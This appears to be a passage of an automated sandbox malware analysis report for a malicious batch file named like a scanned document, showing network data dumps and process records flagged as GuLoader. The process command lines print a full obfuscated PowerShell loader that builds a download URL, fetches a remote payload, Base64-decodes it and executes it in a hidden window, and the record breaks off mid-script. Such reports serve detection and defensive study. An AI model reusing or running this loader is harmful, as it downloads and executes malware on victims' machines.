                                                            2024-10-18 10:39:53 UTC16384INData Raw: 2d f5 ac c5 0d 34 cc c7 d7 d3 35 6d 95 21 08 b8 bb f6 f0 f7 17 96 64 3a 07 f1 a9 a2 76 00 86 75 50 23 a9 55 93 5a 39 86 6a 78 4b 3d 49 4c 09 09 a0 3b f2 45 1b 4e 37 60 d1 79 66 11 6b 37 e9 d5 2a 39 b9 44 a7 aa 48 9c 71 78 70 e7 84 07 0a 42 4f f2 3a e2 45 ce 94 eb 6c 47 21 98 4e f0 1b 64 24 49 70 ff da e8 6a b8 1d 9c 19 73 e1 ec 03 3c 52 cc 2b d2 1f 0e 52 bf f7 0f df 74 ee 1f 4b 55 89 81 34 d3 a2 34 ba 55 17 bb fc af cf 1b a2 31 41 37 90 64 07 1c 26 ec a5 19 30 26 83 8e 39 b4 7c b1 86 6c 83 bf bc 79 66 d9 92 43 0f 37 3a 02 3e 87 a8 18 fb 15 e4 f7 84 11 c2 0c 38 05 c2 8c 9a 3f 5b 66 0a 4e cc 41 0c 41 09 25 49 7c e8 d5 bd c8 5a 91 99 0f 1d cb 5b e8 df c1 95 6e 89 63 07 85 d6 d7 d8 50 36 e1 8e 20 54 11 10 0b ed df 22 af 49 b1 c9 a8 74 ec d6 40 b2 fb dd d7 78
                                                            Data Ascii: -45m!d:vuP#UZ9jxK=IL;EN7`yfk7*9DHqxpBO:ElG!Nd$Ipjs<R+RtKU44U1A7d&0&9|lyfC7:>8?[fNAA%I|Z[ncP6 T"It@x
                                                            2024-10-18 10:39:53 UTC16384INData Raw: 93 b0 08 88 c3 4a 30 41 63 7a 07 c6 67 cf a6 a5 6b 69 c0 eb dc 38 74 78 e6 9e 95 3c e8 a7 cc cf b8 be 75 f1 a5 9a 7b c1 55 12 41 9e 26 02 55 7f 6a ef d4 c1 a1 18 91 0d 0d 74 15 ce c8 3e 39 89 34 e9 e9 c9 ad fb 23 87 3a 7b f1 79 51 d3 28 e9 fd 4c cf 7d 67 39 24 45 58 af 2a 43 c7 bc 05 47 0f 12 4c 3f c5 05 7e 81 62 e8 23 87 7c 42 7e 46 5f e3 bd 60 ec 9e 5d 02 30 0e ed 4b 44 2e b8 09 e5 b8 c4 62 13 4a 6b 62 51 0c 20 9d ab 27 5c ac 95 1f a9 94 36 7f 93 03 ad f5 be 2b 79 cb b0 32 33 29 38 f7 19 4c 2c c9 d0 5b 06 d8 15 fa aa a3 d4 73 21 06 7a 6f 05 94 bc 13 e7 3d b1 4e 64 90 7f e1 2b c7 b8 7b 00 15 b8 ad 60 67 a1 38 e8 e7 5a 63 85 db 11 78 dc fd 0c a4 98 a7 b1 a8 4e e2 cf 40 a3 3c 0b d6 7e 8b 79 64 af 13 a8 1c 5c 88 f2 4a 47 b8 db f5 90 32 bb aa 3a 14 b3 25 a0
                                                            Data Ascii: J0Aczgki8tx<u{UA&Ujt>94#:{yQ(L}g9$EX*CGL?~b#|B~F_`]0KD.bJkbQ '\6+y23)8L,[s!zo=Nd+{`g8ZcxN@<~yd\JG2:%
                                                            2024-10-18 10:39:53 UTC16384INData Raw: 9e c3 95 0b 05 34 d8 f2 8b b4 e7 82 0b f0 cc 3c f5 96 db cc 8b 83 76 67 91 3f 53 da 5f 08 6b 13 df fb 99 ee 6d 1a 59 eb 44 22 9b a8 19 b8 3c 4c 01 b6 9c 1c 7f bf 98 2e ae 9a 6c 37 a1 2a ff e9 c0 00 71 b6 d0 d1 56 6f cd 86 28 15 2d 3a 9b 9d 5e 8b 5c ed 03 3a 52 e3 f3 e4 20 04 f8 8d 1e 7a eb 7a 84 ef ec 39 c0 6b 2e e0 14 ee c5 c2 5e 27 6b 53 fc 4d 21 8c e7 0d 1b 5c fe e3 17 8c 91 47 a7 ab 8b f8 77 be 0d 84 2a 4d ce 48 79 b7 a5 0e 60 b2 49 31 73 90 66 55 49 ac a8 ed 33 e9 b8 e5 fe b5 0d d0 f8 fd 42 c0 62 0a cf b9 a7 22 aa 72 97 90 76 e8 f6 26 fd bc 87 7c 83 d8 ce c5 4a 03 8b 0d 8d 87 25 11 9e 1f a1 73 06 56 7b b3 2f 58 d5 db 8f 65 62 7e 51 1e 85 bd 40 2f 36 28 f4 56 28 18 86 eb c3 59 91 57 b8 0d 60 d4 0f 5f 44 c6 b9 2c 71 9e f9 43 c0 1a da ab b1 e3 82 bd 03
                                                            Data Ascii: 4<vg?S_kmYD"<L.l7*qVo(-:^\:R zz9k.^'kSM!\Gw*MHy`I1sfUI3Bb"rv&|J%sV{/Xeb~Q@/6(V(YW`_D,qC
                                                            2024-10-18 10:39:53 UTC16384INData Raw: 70 5c d9 47 19 4c bc 01 70 08 4e 25 91 d0 8a c9 6d b7 e9 4f d8 df 07 ca bd ad 11 0b a0 40 e8 0b 57 4f a2 2e 67 e5 20 9e e3 49 b8 f0 3c 24 d3 79 a5 6a 21 1a de 00 95 36 93 eb e1 fe bc fb 16 e2 4b 35 be 5f 63 29 44 fd f3 c3 4c f8 34 54 ef 93 a1 0a 42 f7 ac b1 e2 86 31 e0 cf 28 2d 39 70 39 b9 e4 9b af 99 29 a6 5f 3a 1e a9 96 d0 3d 7b 09 f5 58 c3 ad 9c a0 18 f7 55 96 40 08 cd d7 74 a3 95 a7 04 d1 15 7f 35 85 80 b3 98 67 88 31 6b 47 c6 a7 b1 bc 44 b0 14 8a 06 bd cf 3b 01 18 ce 2c 08 47 db 08 91 67 cd b3 93 42 f2 1b 73 75 72 c0 b9 aa 10 93 2b 74 dc ab 5d e9 15 89 bf c6 0c bb e9 ce df c0 13 6a 2e b2 df c0 b4 bd d0 aa 53 88 13 d2 28 24 b2 7d d4 39 61 e8 3e 68 86 56 e5 85 8b 0f 96 35 eb 56 f3 71 b5 b0 77 8e 42 06 6f da d7 23 28 81 1d db 08 9b 3b df 7a d8 dd e4 c9
                                                            Data Ascii: p\GLpN%mO@WO.g I<$yj!6K5_c)DL4TB1(-9p9)_:={XU@t5g1kGD;,GgBsur+t]j.S($}9a>hV5VqwBo#(;z
                                                            2024-10-18 10:39:53 UTC16384INData Raw: c2 f4 c0 74 6f dc 73 ff aa 29 45 43 f0 d1 ef 70 a5 2d 1b 03 7e 06 2d b8 68 65 0c d0 b6 e1 39 cf f1 10 0c 6c a1 9b 02 ad 9a 6e f9 da 99 8d de 14 4b 0f ec b0 c6 f9 72 e1 93 88 41 79 60 b1 d5 8c fd 70 cc 04 e9 ec cd 22 91 20 79 88 f8 58 54 da 87 0c 2e 81 d7 a8 bf 9f c0 b7 6b 10 fc f7 89 1a ba 00 7f a0 45 a7 86 d2 71 c0 2c a5 cc f0 e4 92 8a 0a b9 1f 0e a8 6c 98 e8 c6 02 c2 a3 11 b4 7c 59 7c f7 7b 33 81 f0 38 56 17 e1 8a 8f d8 6c 47 a6 6f df ca 7a c2 6c 81 68 c5 93 76 06 be 4e e3 ee 9c da 14 38 cf 08 1f 41 00 8a 39 bb 84 2b f9 26 ea 44 77 62 a4 c1 0f 77 2e e4 1e c8 1c 9f 9e 0a 6c a7 3f 68 44 5c 0f 0a ce 9c fc 02 30 c8 63 44 bc ef 89 ea ac db 98 39 87 9e b7 f0 8b 2e a9 21 3a d9 78 cf e4 95 65 5c 3a af fc a1 ca 17 cb fa 4d 67 0d 66 9b 0b b6 1d 07 e0 e5 c1 f2 0f
                                                            Data Ascii: tos)ECp-~-he9lnKrAy`p" yXT.kEq,l|Y|{38VlGozlhvN8A9+&Dwbw.l?hD\0cD9.!:xe\:Mgf
                                                            2024-10-18 10:39:54 UTC16384INData Raw: 11 7a 3a 05 f4 a6 3c 49 10 c4 1a 25 1d 4e 2a 0b f9 8e 8e a5 84 84 7d 62 ad ff d7 d4 c4 10 9c d4 43 b8 69 6a a0 1a 2a a5 c0 a5 14 38 4a 57 7d 17 fd 96 54 df bb fc d0 77 d9 39 9d a4 8c 84 fa f3 a1 8b 40 50 42 48 f2 f4 c5 33 93 c1 97 a1 d2 cd 2e 41 94 8c 6c d8 75 02 6a ba 98 1d 3f fb 99 7b 2b 0b 7b eb 7a 06 0f 24 a0 06 f6 95 02 53 6a 1d 3d 0f 45 24 ba 6e f1 5d 0f 4e b1 3f 3f 92 c7 23 8a 91 47 c7 c8 9e ed 5a ca 8a ed cd b5 4a e9 58 b8 21 5b ea 46 f0 54 d0 d8 e2 48 19 21 2c 42 4f cc 80 6e 6d 67 60 5a e0 53 37 ca da c4 a9 88 a6 cb 63 a3 1a 1c d7 b1 f9 a2 77 54 13 de f9 ca 98 ca 18 8e 07 29 56 30 6b 13 ff d6 27 a8 0f cc f8 17 a1 85 1a 4e e5 65 38 60 e4 ac c2 6e df e2 e6 ac 7e 7c 85 b6 ce d5 ca ce 32 cf 2c 48 eb 9e 27 db f5 b2 46 2a 49 15 72 46 a0 a6 ca 40 97 13
                                                            Data Ascii: z:<I%N*}bCij*8JW}Tw9@PBH3.Aluj?{+{z$Sj=E$n]N??#GZJX![FTH!,BOnmg`ZS7cwT)V0k'Ne8`n~|2,H'F*IrF@
                                                            2024-10-18 10:39:54 UTC16384INData Raw: 5d cb 57 85 bc 51 cc 55 68 73 6a 8a 7c 1d 70 9e 02 ba 4e 84 6b 2e a5 34 97 ec 6f bd 02 ca 97 a0 b0 7b f5 a8 dc 0b 6a 34 5e ec d2 96 ce 88 23 2b ff 30 7a c6 39 33 b3 7a 72 3e 99 75 d9 45 de b7 a0 01 de c6 fd 56 54 95 7f 12 5b bf 90 d6 32 78 fb 1f f6 b4 2e 5a a1 7f 7e c6 69 9e c3 03 c8 bd de 67 c5 ff 96 20 00 71 1a fe 8a bf 95 e9 2d ca e6 07 c5 a8 88 f1 ba 1d ee 2c e0 85 55 b0 a0 cf 89 22 90 11 58 11 a3 86 71 a9 86 9c 4c ec 12 1f aa 1c 52 2e 7d 6e a3 89 da 14 8a 07 65 da 2c 3c 83 bb 1d b0 00 24 5e 9d 6f 0a f0 32 99 1f cd b7 ab 9c 1b 70 e4 6e 77 f0 24 4a 2f e7 16 a2 fe 9a 07 51 63 86 06 f8 55 c7 0f 7f cf 18 3e 3b 11 0d 54 2f 25 22 b5 7d 16 a6 53 10 3d ea 46 f9 83 7e 12 68 ed 8a a0 a0 db a2 f5 a9 b5 8f 96 94 27 92 07 6f 59 ee 4f 85 a4 fe 76 f2 73 fb a0 92 3c
                                                            Data Ascii: ]WQUhsj|pNk.4o{j4^#+0z93zr>uEVT[2x.Z~ig q-,U"XqLR.}ne,<$^o2pnw$J/QcU>;T/%"}S=F~h'oYOvs<
                                                            2024-10-18 10:39:54 UTC16384INData Raw: 3e d9 01 d8 f0 f0 72 7e 1c fc 19 ea 4a 80 37 0f 3e a0 39 41 4e a5 4c b3 2b 9f 6f 43 3e 0c 74 c7 a9 7a 11 65 de 44 da 24 25 b8 a5 ac 3f 29 17 9b 55 fe 09 0e 43 2f c4 50 5e b8 21 8a 84 5d a2 9e 2f d7 90 4a 69 c8 34 c1 a9 a6 ee 91 a6 b8 3e 63 4c 10 75 1f 6e 2a 57 14 73 01 55 62 ab e2 53 fc c1 f8 fa 77 49 36 43 0d 68 c1 11 05 56 5c d1 1a 90 87 99 d1 81 3c 1c f0 f9 35 7b b8 c9 ac 54 80 39 1b 44 8e 43 6e 77 74 0a 59 a3 cb d2 9d 13 83 10 5e 54 0c e4 2c 96 6d 33 d8 0e 5b 88 d7 3a 82 22 e0 35 10 4b 8a b2 2c af 9c 58 46 08 e1 b0 fc 93 27 49 8b a4 c0 fc dc 7f 1a a1 ad 85 cb 96 aa 18 7c 47 d6 a1 ee 88 e5 1f 92 47 f1 df c8 03 5f 1c 54 a3 81 9d 87 c2 47 ee db b2 70 c4 52 f3 2b 4c f7 17 fb d9 4d 90 8d 6d bc fd 1b 38 8b 57 d0 c1 44 40 c4 5c 27 f2 11 63 78 3f 5b 8e 89 14
                                                            Data Ascii: >r~J7>9ANL+oC>tzeD$%?)UC/P^!]/Ji4>cLun*WsUbSwI6ChV\<5{T9DCnwtY^T,m3[:"5K,XF'I|GG_TGpR+LMm8WD@\'cx?[
                                                            2024-10-18 10:39:54 UTC16384INData Raw: b9 f5 57 0b 7a 4e e8 bc b0 dd 05 bf 29 a8 d7 a5 43 23 43 0b 7f 7a d2 7f 74 fd 25 a7 00 28 2b cc fc 1f be 84 6e 7b 13 e3 ed f7 86 c4 e0 44 36 21 2f de 23 3b 80 bc 1a 6f b9 f4 f4 fb bc b9 e1 0e 88 ac 50 a9 1c 66 38 31 c2 70 85 81 33 50 71 85 28 96 b9 ca 6e 4c 7b 63 df 29 0f 69 4f 98 1d 3f c7 89 7b 1e 29 5c e9 7a 6c 79 67 4d 7b c4 f1 0b 2d 00 6a b0 88 18 a6 bb 6e a1 36 22 37 98 3f 37 3a ef 14 f4 58 b8 83 54 69 8d 52 ae 8d ae 67 90 d7 eb 55 b5 a5 0e bb ae c4 8c 3c d7 e5 c1 14 a1 93 e4 11 e8 b8 e5 db f7 ea 54 51 d2 96 c2 62 e2 e4 88 f6 ca b9 c0 1b 1c d1 bc fa 79 a3 09 20 1e 27 7e 54 cd a7 ca 4a 6e 59 87 73 9a 87 ef 1a 64 a2 06 f0 63 21 2c f0 17 80 e0 94 e2 20 37 b4 aa df 86 e7 a3 09 7e 8b 7a fc e2 ee c9 70 ee 14 0d eb 1b 0f 31 db 38 46 24 71 e4 8b bb fe d3 51
                                                            Data Ascii: WzN)C#Czt%(+n{D6!/#;oPf81p3Pq(nL{c)iO?{)\zlygM{-jn6"7?7:XTiRgU<TQby '~TJnYsdc!, 7~zp18F$qQ
                                                            2024-10-18 10:39:54 UTC16384INData Raw: be 85 08 c6 55 87 40 5c c1 9f 00 3e e7 62 9f 3b 95 ae 22 86 ff 72 47 3e a5 6b f7 f1 7b 26 82 db 05 7d 50 78 5e 8c ef 8c f4 7f c7 d7 df c1 44 ad 51 da 28 58 c4 28 21 24 6c 4c 85 ff 83 13 5d 60 31 2f 6e 14 e9 1d c0 88 58 0d 6f 70 ac e0 49 48 9c fc ff c4 e7 7b f8 81 d5 43 f2 3a e2 c0 1c e1 e3 46 c4 79 71 c1 f0 1b 64 a9 ce ac fd da e8 e1 77 77 9c 49 9b b4 13 fc c3 0b 95 ed 55 a7 0e 52 bf f6 8f 60 58 f4 1e 4b 52 f3 99 36 1b 5c 7f 4c 73 50 88 6a 57 02 3a f6 08 a3 cb 00 14 75 73 a9 ab f1 74 10 ce 3a b9 d2 00 7d be 6f 4d 87 d5 42 c2 49 07 34 32 b4 0c 4d 02 05 65 c8 54 85 49 16 4a 14 11 c2 0c 69 fa b6 a8 a6 cf 6c fb 42 54 1a d7 e0 6e df 5b 82 a2 1e 20 99 88 fa 57 c2 15 cb b7 2c e1 4e bf 7a 74 35 11 a1 eb 82 23 71 b5 26 18 77 42 06 6f 59 9a f8 fe aa 48 03 0c d2 39
                                                            Data Ascii: U@\>b;"rG>k{&}Px^DQ(X(!$lL]`1/nXopIH{C:FyqdwwIUR`XKR6\LsPjW:ust:}oMBI42MeTIJilBTn[ W,Nzt5#q&wBoYH9


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:06:39:02
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\SKM_0001810-01-2024-GL-3762.bat" "
                                                            Imagebase:0x7ff77ec80000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:06:39:02
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:06:39:03
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -windowstyle hidden " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t Endii,osofro nuntes Odi.RounDSad,oSidsw LunnGalcl.radoaktiacynodApprF aboiD.fflAutoeSibs(Agra$AfseTPremh TidiHemirNa udkbere usinTurrdSchoeim.oa n.sl Van,Re,y$CoroN FjeoPhrenHerauAft sByp eIantrThorsWeat)Nedr ';$Nonusers=$Engrospriserne;Indsigelser (Overfallen 'Reel$ irtg agalArbeoT rtbCas A,kspLIndd:Graet avnRL,baeframsKnneiSem D AsteSmmeD,aanEjudaS Hy,=Dist(NachTImpuEFa ts,bbatThob-LaryPsoc,A HintPro HHnge Unsu$pastnOpnao AwnN ltrUAlkaSRaptETarmr WassMarm) Tox ');while (!$Tresidedes) {Indsigelser (Overfallen 'Nskv$sammgIn ilCr,moBeatbLadea ChulSimu:WinnSQuilaTronmAffalEpiteHirtmFe,saFll p S lpTesteTrain,kaa=L,kt$KimotBrysrF niu Re eS cs ') ;Indsigelser $Makkerens;Indsigelser (Overfallen 'Fo mS.ybetAc,daAm.iRRapptBrea-Puncs rolL uze StaEP orPShod Revi4Info ');Indsigelser (Overfallen 'le c$Ko eGMisel T.oOSinoBNomaAM ssL Eks:Die.t EgerflagEPhossA,rai Pr dTwisEWooddCirceE,ges Jun=Udes(S ustTheceApodsSkretMel -MisbPKongaViseTVintH Lsk Nonp$Tnknn belo.ancNAll USkabSMarieSpitr DucSdonk)de.l ') ;Indsigelser (Overfallen ' ee$ AntGObsel of.o SmebTerma ellPrei: ilsU O,sNSemiSProdyGarnSGigmTRekoE JewM CouaV kstPlaiiEx,esTi biSultNrebsgDi csRs,n=Valg$F.ung CulL,hreoCol bUi,dAArbeL N s: TeaUAktiN TessPolyURingCSammc Sp eWowsESemidWongi VinnRhinGPeev+Lyri+Ele,%D oz$PaleI FornUdglDS.gtOFemtmBlaaaEsteBRestl Kome Cri.RoofcMilioPsycUIndlngernT Hi ') ;$Thirdendeal=$Indomable[$unsystematisings];}$Brasilete=297855;$Dunkelt=31467;Indsigelser (Overfallen 'F ra$A ilg ReolRe.eoSupeb ForaS,ucLSt.f: rbeaContBWorkjMediE.humC Na TKupp Kne= T.l DatgNo me.aisTGlis-ForscDkk,OVldiN Selt L mESmlenHoffT Sti Eund$Angun atoUsocN UdvUpa kSIn uE InyRSy aS fte ');Indsigelser (Overfallen ' Ant$TilbgD khl ApooForsbHalfaSexclProt:WeenAT enr.aedaAchlc SpehS penVogeiogeed veta LasnEdri Dags= t.t Subl[ elS IntyDrivsb.zotRelae intmSk t. oadCBabuoScolnHa ivConce JenrLimft abs]We p:,ole:vandFKon rSynpoSealm WheBJag aSgetsBrugeKost6Macu4 UndS ingtU.akrGalai InfnGenog.eds(Gale$RendaBolibConvjLoope BjlcCalot Ko )Wewe ');Indsigelser (Overfallen ' mpl$ TubGS.igLUdnvOKongBIndiA .ntLP,os:Ov.rNTeleMe anTRece Glio= Can mov[CornS angYH.posOmbytUrocErimemUnsw.ArtiTBr.mE M.sxBronT nn.Pante inNKnogC Chao CoaD UnbIAlmuNLio g Reg] Ude: .ar:MickA FraSInteCM goideniIdive.Bespggrone FortVollSLaagtbr wrLo dIKe inEspeGKapi(opkl$BisiAUdtrRSupeA Be,cSudaHBlasNLuetis.ordN ncaAn.eN Rat)Vava ');Indsigelser (Overfallen 'Spha$Bes GUnralLanaObataBVandA DecLEnkr:.oneTNordUE,ipiTalr=Kare$EumiN.quaMresptVoca. Ga.SOmsmUSup.BHollS ,roTSamfRKla,iZealNStadg Mar(syge$ WalB Gr,ReuroAA.tiS toiBi eLem.oeSlyptBiltETrma, For$ irkDblgeUAfp.nCu tkSpriERumllYtretBade)Anno ');Indsigelser $Tui;"
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1842948147.00000299B0691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:06:39:03
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:06:39:12
                                                            Start date:18/10/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Enfect Tictoc Hellebardistens Skovrankernes Redoblingers Soloth #>;$Rawboned31='Observationsklasser';<#Calvinistically Brunstiges Matroser Researched #>;$Anisometropic=$Booed+$host.UI; function Overfallen($Subantarctic161){If ($Anisometropic) {$Fredningerne++;}$Ponceau=$Lsevrdiges+$Subantarctic161.'Length'-$Fredningerne; for( $Unsullenly=4;$Unsullenly -lt $Ponceau;$Unsullenly+=5){$Prikkendes=$Unsullenly;$Cembalister+=$Subantarctic161[$Unsullenly];$Overproductive='Mglernes';}$Cembalister;}function Indsigelser($bullaces){ & ($Klassikernes130) ($bullaces);}$Resistante=Overfallen ' upeMRdstoHalvz teriAntelja el Un aDogw/Forl ';$Resistante+=Overfallen ' ajs5N.en. eng0 or Step(B,nnWChiriDystnB dedFy koIntewRuf sSkol UninNT mbT unk Chap1Vern0None..yto0Kolo;Kleh LibrWRi.gi rugn D e6Ove 4Dyve;Over ,agdx opf6Lage4klas;Forf SkelrScorvDrif:Vate1Lith3Orga1Bogs.Ber 0Unla)Agle UnliGSynkeVurdcL rekHel oPles/Dane2Form0 Che1Ramb0P on0ublu1B.ll0 Udl1Top. VareFS peiSnasrKuldeIntefMalpoDrifxgr b/Best1.ana3 utw1.igt. Len0Ro,a ';$mbori=Overfallen 'ForsUTeleSPon,e IbiRCom,-unamAsk lGOps ECrypNTeleTYder ';$Thirdendeal=Overfallen 'BarrhSonatD.stt Othptr n:Chew/Mine/Wifea,tacrTrsktStati SkoeOverrTelti,rne.Mexir,agnoRecr/ ShalDos /Cap SUdd q NonuHy,riRagnr Raat.emiiRefos,okkhFrem. dstBomboD.edcinor ';$Chromophotographic=Overfallen 'soli> Kur ';$Klassikernes130=Overfallen 'Je eI F,leRepaXF nc ';$Adddbr='Malleal';$earlships='\Categorizes.Afg';Indsigelser (Overfallen 'Syzy$Ins,GMisaLDemoo vibBib a Seal Uti:CinnEKse NLag gEnjeR TroODataS llepI teROttoiinglSW.ekeF.amrGermnAbseeKory=Bes $ UdbEAp knKarrvAmar:F yvamanvP etypPat.DTrskAG,netHnenAFel,+Aaer$ Hiseko oA IngR stel PogSTou.hRe,uiFolkPPareSPrea ');Indsigelser (Overfallen ',rei$TwosgQua L errO SpeBdynaAK.ntLRdse:RefriSpe NUn eDTom oH,pemUnmiAElidbDehyl TaxeTeks=Nrin$Va ut LydH CouI OveRConnd Atoe U.sNEksiD ,rbeMania En LDilu.t.orSWavepK ntl leriFrihTDieb( oly$JordcTelehMd drbulloCaroMS eaOGru.P ceahOss OFacetSutuOPsykgClayrD riaH phpT chH EriI HolCGg,e)Ilds ');Indsigelser (Overfallen 'Hemo[B tyN lokEEf.eT Vra. T ssSixtEGeo.r FerVAnaliSv mc o,qe lorpSporoEndai OmbNTheutFilmMCustaAl,oN CroA YelGSkvaE edgr.lbn] Um.: rom: IniSC tre ndeCAffeuTongRTremIOp kt SelY .laP DisR Ge.OKlosTIn io EntCLmleo ell Den Grak= uni Toch[Uph,NCra E HypTSk.l.O,lgsLentE linC SlaUInsuRColoIEn.rtHavvYForsPVelfRDonno airtStikOMicrC.aneORotalSnuftUlvsYTilgpForteWea.]Mois:Le t: ,retBraiLDecrSSeku1Hept2 Mir ');$Thirdendeal=$Indomable[0];$Marinarkologer=(Overfallen 'Stup$ MorgBesklIns OTronb MatAVildL kke:PaasDSpecEInspsTil,EAmphNhockS SkrIMantTOpgrI SteZM rsABildT.apiiEp cOUr,enBedvSA pr=,ambnSproeSemiwKluk-U.deOvi abSoupJPhonESur cBallT oly Fde SR efYVandsSkdstGoutekollM Hie.Tre nT,rmETaubTBro .mo tWpr,pEFagmB Ha,cOverL polihydreBridn rrTAnes ');Indsigelser ($Marinarkologer);Indsigelser (Overfallen 'Tili$OmdeDunpreKhazs Gese innBrygsVaabi NsttNon i Ov.zResmaOr,itbu liblanoRappn.rsgsR.ad.horrH SoleHybea AnsdepileNor rZerssSkun[ Enr$No dm TzebJamio ,asrc cai Vin]kont=pe s$ EncR ForeNutrsTot,i.relsSeretSvi.asubtn SpatFr aeOu,s ');$Makkerens=Overfallen 'Mir $CockD frdeO ses Me e Baln mans SkriIntetHereiNatizUncoaGau,t Endii,osofro 